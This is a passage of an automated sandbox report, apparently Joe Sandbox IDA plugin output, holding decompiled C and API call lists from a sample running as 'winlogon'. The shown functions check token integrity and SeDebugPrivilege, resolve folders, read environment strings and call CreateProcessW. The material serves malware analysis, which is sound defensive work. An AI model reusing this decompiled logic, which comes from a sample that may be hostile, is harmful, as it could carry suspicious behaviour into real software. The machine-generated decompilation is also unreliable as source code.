    										goto L38;
    									}
    									__eflags = _t107 - 1 - 1;
    									if(_t107 - 1 > 1) {
    										goto L34;
    									}
    									E00D72EE8( &_v24, _t121, _v12);
    									goto L15;
    								}
    							}
    							 *(E00D7210F()) =  *_t97 & 0x00000000;
    							 *((intOrPtr*)(E00D72122())) = 0x16;
    							_t81 = E00D70269();
    							goto L38;
    						}
    						__eflags = _t107 - 1;
    						if(_t107 != 1) {
    							goto L9;
    						}
    						goto L6;
    					}
    					 *(E00D7210F()) =  *_t99 & _t121;
    					 *((intOrPtr*)(E00D72122())) = 0x16;
    					E00D70269();
    					goto L41;
    				}
    				goto L41;
    			}

    APIs
      • Part of subcall function 00D72F55: GetConsoleMode.KERNEL32(?,?), ref: 00D72FBA
      • Part of subcall function 00D72D35: GetConsoleCP.KERNEL32 ref: 00D72D77
      • Part of subcall function 00D72D35: __Stoull.NTSTC_LIBCMT ref: 00D72DF2
      • Part of subcall function 00D72D35: __Stoull.NTSTC_LIBCMT ref: 00D72E0D
      • Part of subcall function 00D72D35: WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00D72E33
      • Part of subcall function 00D72D35: WriteFile.KERNEL32(?,?,00000000,00D734AA,00000000), ref: 00D72E52
      • Part of subcall function 00D72D35: WriteFile.KERNEL32(?,?,00000001,00D734AA,00000000), ref: 00D72E8B
      • Part of subcall function 00D72D35: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00D734AA,?,?,?,?,?,?), ref: 00D72ECD
      • Part of subcall function 00D72EE8: GetLastError.KERNEL32(?,?,?,?,?,00D73492,?,?,?,?,?,?,?,?,?,00D86C18), ref: 00D72F44
      • Part of subcall function 00D73198: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,?,?,?,00D734F7,?,?,?), ref: 00D7324B
      • Part of subcall function 00D73198: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D73279
      • Part of subcall function 00D73198: GetLastError.KERNEL32(?,00D734F7,?,?,?,?,?,?,?,?,?,?,00D86C18,00000014,00D6EC96,00000000), ref: 00D732AA
      • Part of subcall function 00D730AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D73154
      • Part of subcall function 00D730AA: GetLastError.KERNEL32(?,00D734E7,?,?,?,?,?,?,?,?,?,?,00D86C18,00000014,00D6EC96,00000000), ref: 00D7317D
      • Part of subcall function 00D72FCB: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D73066
      • Part of subcall function 00D72FCB: GetLastError.KERNEL32(?,00D73507,?,?,?,?,?,?,?,?,?,?,00D86C18,00000014,00D6EC96,00000000), ref: 00D7308F
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D73522
    • GetLastError.KERNEL32(?,?,?,?,?), ref: 00D7352C
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    C-Code - Quality: 86%
    			E00D62EB0(void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				char _v532;
    				char _v1052;
    				void* _v1056;
    				signed int _v1060;
    				signed int _t25;
    				void* _t27;
    				signed int _t30;
    				signed int _t34;
    				signed int _t35;
    				signed int _t38;
    				signed int _t41;
    				signed int _t42;
    				signed int _t43;
    				signed int _t44;
    				signed int _t47;
    				signed int _t48;
    				signed int _t51;
    				signed int _t52;
    				signed int* _t59;
    				signed int _t65;
    				intOrPtr* _t68;
    				intOrPtr* _t72;
    				signed int _t77;
    				int _t80;
    				signed int _t83;
    				void* _t91;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    				signed int _t97;
    				void* _t98;
    				signed int _t99;
    				signed int _t101;
    				signed int _t103;
    				void* _t104;
    				void* _t110;
    				signed int* _t117;
    				void* _t118;
    				void* _t119;
    				signed int _t120;
    				void* _t121;
    				void* _t122;
    				void* _t123;
    				void* _t124;
    
    				_t25 =  *0xd88004; // 0x276b9783
    				_v8 = _t25 ^ _t120;
    				_push(0xdeefbad7);
    				_t117 = __edx;
    				_t59 = __ecx;
    				_t27 = E00D61A30(0, __edx);
    				_t122 = _t121 + 0xc;
    				if(_t27 != 0) {
    					_v1056 = 0xffffffff;
    					_t91 = GetCurrentProcess();
    					_push(0xdeefbad7);
    					_push( &_v1056);
    					_t30 = E00D61A30(0, _t91);
    					_t123 = _t122 + 0x10;
    					__eflags = _t30;
    					if(_t30 == 0) {
    						goto L1;
    					} else {
    						_t34 = OpenProcessToken(_t91, 8,  &_v1056);
    						__eflags = _t34;
    						if(_t34 == 0) {
    							goto L1;
    						} else {
    							_t63 = _v1056;
    							__eflags = _v1056;
    							if(_v1056 == 0) {
    								goto L1;
    							} else {
    								_v1060 = 0;
    								_t35 = E00D62820(_t63,  &_v1060); // executed
    								__eflags = _t35;
    								if(_t35 == 0) {
    									goto L1;
    								} else {
    									_push(__edi);
    									E00D6D520(__edi,  &_v1052, 0, 0x414);
    									_t124 = _t123 + 0xc; // executed
    									_t38 = E00D62650(_v1060,  &_v1052, __eflags); // executed
    									_t65 = _v1060;
    									_t101 = _t38;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										__eflags = _t65 - 0xffffffff;
    										if(_t65 != 0xffffffff) {
    											__eflags = _t65 - 0xcccccccc;
    											if(_t65 != 0xcccccccc) {
    												E00D7009A(_t65);
    												_t124 = _t124 + 4;
    											}
    										}
    									}
    									__eflags = _t101;
    									if(_t101 == 0) {
    										L32:
    										__eflags = _v8 ^ _t120;
    										return E00D6ABE4(_v8 ^ _t120);
    									} else {
    										_t68 =  &_v1052;
    										_t94 = _t68 + 2;
    										do {
    											_t41 =  *_t68;
    											_t68 = _t68 + 2;
    											__eflags = _t41;
    										} while (_t41 != 0);
    										__eflags = (_t68 - _t94 >> 1) + 0x10;
    										_t42 = E00D68B60((_t68 - _t94 >> 1) + 0x10, (_t68 - _t94 >> 1) + 0x10);
    										_t72 =  &_v532;
    										 *_t117 = _t42;
    										_t95 = _t72 + 2;
    										do {
    											_t43 =  *_t72;
    											_t72 = _t72 + 2;
    											__eflags = _t43;
    										} while (__eflags != 0);
    										_t44 = E00D68B60((_t72 - _t95 >> 1) + 0x10, __eflags);
    										 *_t59 = _t44;
    										_t103 =  *_t117;
    										__eflags = _t103;
    										if(_t103 == 0) {
    											L26:
    											__eflags = _t117 - 0xffffffff;
    											if(_t117 != 0xffffffff) {
    												__eflags = _t117 - 0xcccccccc;
    												if(_t117 != 0xcccccccc) {
    													E00D7009A(_t117);
    													_t124 = _t124 + 4;
    												}
    											}
    											__eflags = _t59 - 0xffffffff;
    											if(_t59 != 0xffffffff) {
    												__eflags = _t59 - 0xcccccccc;
    												if(_t59 != 0xcccccccc) {
    													E00D7009A(_t59);
    												}
    											}
    											goto L32;
    										} else {
    											__eflags = _t44;
    											if(_t44 == 0) {
    												goto L26;
    											} else {
    												_t96 =  &_v1052;
    												_t118 = _t96;
    												do {
    													_t47 =  *_t96;
    													_t96 = _t96 + 2;
    													__eflags = _t47;
    												} while (_t47 != 0);
    												_t97 = _t96 - _t118;
    												_t104 = _t103 + 0xfffffffe;
    												__eflags = _t104;
    												do {
    													_t48 =  *(_t104 + 2);
    													_t104 = _t104 + 2;
    													__eflags = _t48;
    												} while (_t48 != 0);
    												_t77 = _t97 >> 2;
    												memcpy(_t104, _t118, _t77 << 2);
    												_t98 =  &_v532;
    												_t80 = _t97 & 0x00000003;
    												__eflags = _t80;
    												memcpy(_t118 + _t77 + _t77, _t118, _t80);
    												_t119 = _t98;
    												do {
    													_t51 =  *_t98;
    													_t98 = _t98 + 2;
    													__eflags = _t51;
    												} while (_t51 != 0);
    												_t99 = _t98 - _t119;
    												_t110 =  *_t59 + 0xfffffffe;
    												__eflags = _t110;
    												do {
    													_t52 =  *(_t110 + 2);
    													_t110 = _t110 + 2;
    													__eflags = _t52;
    												} while (_t52 != 0);
    												_t83 = _t99 >> 2;
    												memcpy(_t110, _t119, _t83 << 2);
    												memcpy(_t119 + _t83 + _t83, _t119, _t99 & 0x00000003);
    												__eflags = _v8 ^ _t120;
    												return E00D6ABE4(_v8 ^ _t120);
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					return E00D6ABE4(_v8 ^ _t120);
    				}
    			}

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetCurrentProcess.KERNEL32 ref: 00D62EF9
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62F26
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62873
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?), ref: 00D628A6
      • Part of subcall function 00D62820: IsValidSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628B2
      • Part of subcall function 00D62820: GetLengthSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628BE
      • Part of subcall function 00D62820: CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
      • Part of subcall function 00D62650: LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    C-Code - Quality: 92%
    			E00D76869(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t48;
    				int _t51;
    				signed int _t54;
    				signed int _t55;
    				short _t58;
    				signed char _t62;
    				signed int _t63;
    				signed char* _t72;
    				signed char* _t73;
    				int _t78;
    				signed int _t81;
    				signed char* _t82;
    				short* _t83;
    				int _t87;
    				signed char _t88;
    				signed int _t89;
    				signed int _t91;
    				signed int _t92;
    				int _t94;
    				int _t95;
    				intOrPtr _t98;
    				signed int _t99;
    
    				_t48 =  *0xd88004; // 0x276b9783
    				_v8 = _t48 ^ _t99;
    				_t98 = _a8;
    				_t78 = E00D7643C(__eflags, _a4);
    				if(_t78 != 0) {
    					_t94 = 0;
    					__eflags = 0;
    					_t81 = 0;
    					_t51 = 0;
    					_v32 = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t51 + 0xd88308)) - _t78;
    						if( *((intOrPtr*)(_t51 + 0xd88308)) == _t78) {
    							break;
    						}
    						_t81 = _t81 + 1;
    						_t51 = _t51 + 0x30;
    						_v32 = _t81;
    						__eflags = _t51 - 0xf0;
    						if(_t51 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t78 - 0xfde8;
    							if(_t78 == 0xfde8) {
    								L23:
    							} else {
    								__eflags = _t78 - 0xfde9;
    								if(_t78 == 0xfde9) {
    									goto L23;
    								} else {
    									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
    									__eflags = _t51;
    									if(_t51 == 0) {
    										goto L23;
    									} else {
    										_t51 = GetCPInfo(_t78,  &_v28);
    										__eflags = _t51;
    										if(_t51 == 0) {
    											__eflags =  *0xd91694 - _t94; // 0x0
    											if(__eflags == 0) {
    												goto L23;
    											} else {
    												E00D764AF(_t98);
    												goto L37;
    											}
    										} else {
    											E00D6D520(_t94, _t98 + 0x18, _t94, 0x101);
    											 *(_t98 + 4) = _t78;
    											 *(_t98 + 0x21c) = _t94;
    											_t78 = 1;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t98 + 8) = _t94;
    											} else {
    												__eflags = _v22;
    												_t72 =  &_v22;
    												if(_v22 != 0) {
    													while(1) {
    														_t88 = _t72[1];
    														__eflags = _t88;
    														if(_t88 == 0) {
    															goto L16;
    														}
    														_t91 = _t88 & 0x000000ff;
    														_t89 =  *_t72 & 0x000000ff;
    														while(1) {
    															__eflags = _t89 - _t91;
    															if(_t89 > _t91) {
    																break;
    															}
    															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
    															_t89 = _t89 + 1;
    															__eflags = _t89;
    														}
    														_t72 =  &(_t72[2]);
    														__eflags =  *_t72;
    														if( *_t72 != 0) {
    															continue;
    														}
    														goto L16;
    													}
    												}
    												L16:
    												_t73 = _t98 + 0x1a;
    												_t87 = 0xfe;
    												do {
    													 *_t73 =  *_t73 | 0x00000008;
    													_t73 =  &(_t73[1]);
    													_t87 = _t87 - 1;
    													__eflags = _t87;
    												} while (_t87 != 0);
    												 *(_t98 + 0x21c) = E00D763FE( *(_t98 + 4));
    												 *(_t98 + 8) = _t78;
    											}
    											_t95 = _t98 + 0xc;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L36:
    											E00D76514(_t78, _t91, _t95, _t98, _t98); // executed
    											L37:
    											__eflags = 0;
    										}
    									}
    								}
    							}
    						}
    						goto L39;
    					}
    					E00D6D520(_t94, _t98 + 0x18, _t94, 0x101);
    					_t54 = _v32 * 0x30;
    					__eflags = _t54;
    					_v36 = _t54;
    					_t55 = _t54 + 0xd88318;
    					_v32 = _t55;
    					do {
    						__eflags =  *_t55;
    						_t82 = _t55;
    						if( *_t55 != 0) {
    							while(1) {
    								_t62 = _t82[1];
    								__eflags = _t62;
    								if(_t62 == 0) {
    									break;
    								}
    								_t92 =  *_t82 & 0x000000ff;
    								_t63 = _t62 & 0x000000ff;
    								while(1) {
    									__eflags = _t92 - _t63;
    									if(_t92 > _t63) {
    										break;
    									}
    									__eflags = _t92 - 0x100;
    									if(_t92 < 0x100) {
    										_t31 = _t94 + 0xd88300; // 0x8040201
    										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
    										_t92 = _t92 + 1;
    										__eflags = _t92;
    										_t63 = _t82[1] & 0x000000ff;
    										continue;
    									}
    									break;
    								}
    								_t82 =  &(_t82[2]);
    								__eflags =  *_t82;
    								if( *_t82 != 0) {
    									continue;
    								}
    								break;
    							}
    							_t55 = _v32;
    						}
    						_t94 = _t94 + 1;
    						_t55 = _t55 + 8;
    						_v32 = _t55;
    						__eflags = _t94 - 4;
    					} while (_t94 < 4);
    					 *(_t98 + 4) = _t78;
    					 *(_t98 + 8) = 1;
    					 *(_t98 + 0x21c) = E00D763FE(_t78);
    					_t83 = _t98 + 0xc;
    					_t91 = _v36 + 0xd8830c;
    					_t95 = 6;
    					do {
    						_t58 =  *_t91;
    						_t91 = _t91 + 2;
    						 *_t83 = _t58;
    						_t83 = _t83 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L36;
    				} else {
    					E00D764AF(_t98);
    				}
    				L39:
    				return E00D6ABE4(_v8 ^ _t99);
    			}

    APIs
      • Part of subcall function 00D7643C: GetOEMCP.KERNEL32(00000000), ref: 00D76467
      • Part of subcall function 00D7643C: GetACP.KERNEL32(00000000), ref: 00D7647E
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D7670A,?,00000000), ref: 00D768DD
    • GetCPInfo.KERNEL32(00000000,00D7670A,?,?,?,00D7670A,?,00000000), ref: 00D768F0
      • Part of subcall function 00D76514: GetCPInfo.KERNEL32(?,?), ref: 00D76539
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    C-Code - Quality: 53%
    			E00D642C0(int* __ecx, int __edx, void* __edi) {
    				void* _v8;
    				void* __esi;
    				int _t9;
    				int _t10;
    				int _t12;
    				intOrPtr _t13;
    				int _t14;
    				int _t15;
    				intOrPtr* _t28;
    				signed int _t29;
    				signed int _t30;
    				signed int _t33;
    				int _t36;
    				void* _t39;
    				void* _t40;
    				signed int _t41;
    				intOrPtr _t43;
    				void* _t44;
    				void* _t50;
    				int _t51;
    				void* _t54;
    
    				_push(__ecx);
    				_t21 = __ecx;
    				if(__ecx != 0) {
    					_push(_t50);
    					__eflags = __edx;
    					if(__edx == 0) {
    						_push(0x410);
    						_t9 = E00D702C9(__ecx);
    						_t51 = _t9;
    						__eflags = _t51;
    						if(_t51 != 0) {
    							_t9 = E00D6D520(__edi, _t51, 0, 0x410);
    						}
    						 *_t21 = _t51;
    						__imp__SHGetSpecialFolderPathW(0, _t51, 0x2e, 1);
    						return _t9;
    					} else {
    						_v8 = 0;
    						_t10 = E00D643A0( &_v8, __edi, _t50); // executed
    						__eflags = _t10;
    						if(_t10 == 0) {
    							L7:
    							__eflags = 0;
    							return 0;
    						} else {
    							_t28 = _v8;
    							_t4 = _t28 + 2; // 0x2
    							_t39 = _t4;
    							do {
    								_t12 =  *_t28;
    								_t28 = _t28 + 2;
    								__eflags = _t12;
    							} while (_t12 != 0);
    							_t29 = _t28 - _t39;
    							__eflags = _t29;
    							_t30 = _t29 >> 1;
    							if(_t29 != 0) {
    								_push(__edi);
    								__eflags = _t30 + 0x10;
    								_t13 = E00D68B60(_t30 + 0x10, _t30 + 0x10);
    								_t40 = _v8;
    								_t43 = _t13;
    								 *((intOrPtr*)(__ecx)) = _t43;
    								_t54 = _t40;
    								do {
    									_t14 =  *_t40;
    									_t40 = _t40 + 2;
    									__eflags = _t14;
    								} while (_t14 != 0);
    								_t41 = _t40 - _t54;
    								_t44 = _t43 + 0xfffffffe;
    								__eflags = _t44;
    								do {
    									_t15 =  *(_t44 + 2);
    									_t44 = _t44 + 2;
    									__eflags = _t15;
    								} while (_t15 != 0);
    								_t33 = _t41 >> 2;
    								memcpy(_t44, _t54, _t33 << 2);
    								_t36 = _t41 & 0x00000003;
    								__eflags = _t36;
    								memcpy(_t54 + _t33 + _t33, _t54, _t36);
    								__imp__CoTaskMemFree(_v8);
    								return 1;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002E,00000001), ref: 00D6438B
      • Part of subcall function 00D643A0: GetVersionExW.KERNEL32(00000114), ref: 00D643F2
      • Part of subcall function 00D643A0: LoadLibraryW.KERNEL32(shell32.dll), ref: 00D6440A
      • Part of subcall function 00D643A0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00D6441A
      • Part of subcall function 00D643A0: SHGetKnownFolderPath.SHELL32(00D7F2E0,00000000,00000000,?), ref: 00D6442E
    • CoTaskMemFree.OLE32(00000000), ref: 00D6434D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 56%
    			E00D654E0(long __ecx, intOrPtr __edx, void* __edi, CHAR* _a4, CHAR* _a8, intOrPtr _a16) {
    				char _v8;
    				char _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				long _v28;
    				long* _v32;
    				char _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v56;
    				CHAR* _v60;
    				CHAR* _v64;
    				char _v68;
    				char _v124;
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				signed int _t32;
    				long _t35;
    				void* _t36;
    				intOrPtr _t46;
    				CHAR* _t60;
    				signed int _t61;
    				void* _t62;
    				void* _t63;
    
    				_push(0xffffffff);
    				_push(E00D7E360);
    				_push( *[fs:0x0]);
    				_t63 = _t62 - 0x6c;
    				_t32 =  *0xd88004; // 0x276b9783
    				_push(_t32 ^ _t61);
    				 *[fs:0x0] =  &_v16;
    				_t46 = __edx;
    				_t35 = __ecx;
    				_v20 = __ecx;
    				if(__ecx != 0 && __edx != 0) {
    					_t60 = _a8;
    					if(_t60 != 0) {
    						_t35 = GetFileAttributesA(_a4); // executed
    						if(_t35 != 0xffffffff) {
    							_t35 = GetFileAttributesA(_t60); // executed
    							if(_t35 != 0xffffffff) {
    								_v28 = 0;
    								_v24 = 0;
    								_v8 = 0;
    								_t36 = E00D61EC0(_t46,  &_v28, __edi, _t60, _t60); // executed
    								if(_t36 != 0) {
    									_v64 = _t60;
    									_v32 =  &_v28;
    									_v52 = _a16;
    									_v60 = _a4;
    									_push( &_v68);
    									_t63 = _t63 - 0xc;
    									_v68 = _t46;
    									_v56 = 1;
    									_v48 = 0x3e8;
    									_v44 = 0x7d0;
    									_v40 = 0;
    									_v36 = 1;
    									E00D67810( &_v124);
    									_v8 = 1;
    									E00D67600( &_v124, _v20);
    									E00D67680( &_v124); // executed
    									E00D67790( &_v124);
    								}
    								_t35 = _v28;
    								if(_t35 != 0) {
    									_t35 = E00D7009A(_t35);
    								}
    							}
    						}
    					}
    				}
    				 *[fs:0x0] = _v16;
    				return _t35;
    			}

    APIs
    • GetFileAttributesA.KERNELBASE(?,276B9783), ref: 00D6552C
    • GetFileAttributesA.KERNELBASE(?), ref: 00D6553C
      • Part of subcall function 00D67810: InitializeCriticalSection.KERNEL32(?,?,?,00D655B7), ref: 00D6782E
      • Part of subcall function 00D67600: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00D655C6,?), ref: 00D6762E
      • Part of subcall function 00D67600: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00D655C6,?), ref: 00D6763E
      • Part of subcall function 00D67680: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,?,?), ref: 00D676F6
      • Part of subcall function 00D67680: CreateThread.KERNEL32(00000000,00100000,Function_00007D40,?,00000000,00000000), ref: 00D67725
      • Part of subcall function 00D67680: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D67736
      • Part of subcall function 00D67680: CloseHandle.KERNEL32(?), ref: 00D67741
      • Part of subcall function 00D67680: WaitForMultipleObjects.KERNEL32(00000000,000007D0,00000001,000000FF), ref: 00D6775B
      • Part of subcall function 00D67790: CloseHandle.KERNEL32(?), ref: 00D677BF
      • Part of subcall function 00D67790: DeleteCriticalSection.KERNEL32(?,?,00D655D6,?), ref: 00D677FF
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 81%
    			E00D629D0(signed int* __ecx, void* __eflags) {
    				void* _v8;
    				char _v12;
    				void* _t18;
    				void* _t24;
    				signed int* _t25;
    
    				_t25 = __ecx;
    				_push(0xdeefbad7);
    				if(E00D61A30(0, __ecx) == 0) {
    					L6:
    					return 0;
    				} else {
    					_v8 = 0xffffffff;
    					_t24 = GetCurrentProcess();
    					_push(0xdeefbad7);
    					_push( &_v8);
    					if(E00D61A30(0, _t24) == 0 || OpenProcessToken(_t24, 8,  &_v8) == 0) {
    						goto L6;
    					} else {
    						_t23 = _v8;
    						if(_v8 == 0) {
    							goto L6;
    						} else {
    							_v12 = 0;
    							_t18 = E00D62A60(_t23,  &_v12); // executed
    							if(_t18 == 0) {
    								goto L6;
    							} else {
    								 *_t25 = 0 | _v12 != 0x00000000;
    								return 1;
    							}
    						}
    					}
    				}
    			}

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00D629F4
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62A1B
      • Part of subcall function 00D62A60: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00D62ABF
      • Part of subcall function 00D62A60: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,FFFFFFFF), ref: 00D62ADB
      • Part of subcall function 00D62A60: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00D62B10
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 76%
    			E00D65C20(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int _v8;
    				char _v1032;
    				signed int _t11;
    				void* _t15;
    				long _t17;
    				signed int _t37;
    
    				_t35 = __edi;
    				_t11 =  *0xd88004; // 0x276b9783
    				_v8 = _t11 ^ _t37;
    				E00D6D520(__edi,  &_v1032, 0, 0x400);
    				_t15 = E00D65970(__ebx,  &_v1032, _t35, __esi); // executed
    				if(_t15 != 0) {
    					_t17 = GetFileAttributesA( &_v1032); // executed
    					if(_t17 == 0xffffffff) {
    						GetFileAttributesA( &_v1032); // executed
    						return E00D6ABE4(_v8 ^ _t37);
    					} else {
    						return E00D6ABE4(_v8 ^ _t37);
    					}
    				} else {
    					return E00D6ABE4(_v8 ^ _t37);
    				}
    			}

    APIs
      • Part of subcall function 00D65970: GetVersionExW.KERNEL32(00000114), ref: 00D659AF
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A16
      • Part of subcall function 00D65970: __Stoull.NTSTC_LIBCMT ref: 00D65A5B
    • GetFileAttributesA.KERNELBASE(?), ref: 00D65C6D
    • GetFileAttributesA.KERNELBASE(?), ref: 00D65C92
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D76AAA(void* __ecx) {
    				void* _t6;
    				void* _t14;
    				void* _t18;
    				WCHAR* _t19;
    
    				_t14 = __ecx;
    				_t19 = GetEnvironmentStringsW();
    				if(_t19 != 0) {
    					_t12 = (E00D76A73(_t19) - _t19 >> 1) + (E00D76A73(_t19) - _t19 >> 1);
    					_t6 = E00D717FF(_t14, (E00D76A73(_t19) - _t19 >> 1) + (E00D76A73(_t19) - _t19 >> 1)); // executed
    					_t18 = _t6;
    					if(_t18 != 0) {
    						E00D7DAE0(_t18, _t19, _t12);
    					}
    					E00D717C5(0);
    					FreeEnvironmentStringsW(_t19);
    				} else {
    					_t18 = 0;
    				}
    				return _t18;
    			}

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 00D76AAE
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
      • Part of subcall function 00D717C5: HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D76AEE
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D6AA90(WCHAR** __ecx) {
    				int _t9;
    				WCHAR* _t13;
    				int _t15;
    
    				if(__ecx != 0) {
    					_t13 =  *__ecx;
    					if(_t13 == 0) {
    						goto L1;
    					} else {
    						_t9 = CreateProcessW(_t13, __ecx[1], 0, 0, __ecx[0x1a], __ecx[0x1b], 0, 0,  &(__ecx[6]),  &(__ecx[2])); // executed
    						_t15 = _t9;
    						if(_t15 == 0) {
    							GetLastError();
    						}
    						return _t15;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D6AAB8
    • GetLastError.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,00D6358E), ref: 00D6AAC4
    Memory Dump Source
